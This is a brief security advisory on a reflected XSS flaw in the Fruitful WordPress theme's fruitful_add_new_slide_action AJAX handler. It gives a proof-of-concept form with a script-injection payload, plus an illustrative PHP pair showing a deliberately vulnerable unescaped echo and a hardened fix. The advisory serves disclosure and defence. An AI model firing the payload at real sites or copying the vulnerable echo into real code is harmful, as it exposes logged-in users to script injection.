Fruitful [Reflected XSS]


The Fruitful theme is vulnerable to a reflected XSS attack through the AJAX action fruitful_add_new_slide_action. This action outputs the contents of $_POST['data'] without proper escaping, allowing an attacker to craft a malicious request that executes JavaScript in the victim's browser.

Because this action is a privileged one, it only works for a registered, logged-in user.


Use a logged-in user to submit this form:

<form action="" method="post">
    <input type="hidden" name="action" value="fruitful_add_new_slide_action">
    <input type="hidden" name="data" value='"><script>alert(1)</script> <!--'>
    <input type="submit" value="Click Me!">
</form>
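
For the fix side, the following is an added example, not the Fruitful theme's own code: a hypothetical WordPress AJAX handler showing the unescaped echo described above next to a hardened version. Only the hook name is taken from this advisory; the function names, the nonce action, the capability and the emitted markup are assumptions (the attribute context is inferred from the payload's leading `">`).

```php
<?php
// Added example: hypothetical handlers, NOT the Fruitful theme's source.
// Hook name is from the advisory; everything else is assumed for illustration.

// Pattern the advisory describes: request data echoed back without escaping.
function example_add_new_slide_vulnerable() {
    $data = $_POST['data'];
    // Attacker-controlled value lands inside an attribute, so `">` breaks out.
    echo '<input type="hidden" name="slide" value="' . $data . '">';
    wp_die();
}

// Hardened pattern: nonce, capability check, then context-aware escaping.
function example_add_new_slide_hardened() {
    // A form hosted on another site cannot supply a nonce tied to the
    // victim's session; check_ajax_referer() ends the request on mismatch.
    check_ajax_referer( 'example_add_new_slide', 'nonce' );

    // wp_ajax_* only proves the user is logged in, not what they may do.
    if ( ! current_user_can( 'edit_theme_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // Reject array input (data[]=...) before treating the value as a string.
    $data = isset( $_POST['data'] ) ? wp_unslash( $_POST['data'] ) : '';
    if ( ! is_string( $data ) ) {
        wp_send_json_error( 'invalid data', 400 );
    }
    $data = sanitize_text_field( $data );

    // Escape for the exact output context (an HTML attribute here).
    echo '<input type="hidden" name="slide" value="' . esc_attr( $data ) . '">';
    wp_die();
}

// wp_ajax_{action} fires for logged-in users only, which matches the
// advisory's note that the action is privileged.
add_action( 'wp_ajax_fruitful_add_new_slide_action', 'example_add_new_slide_hardened' );
```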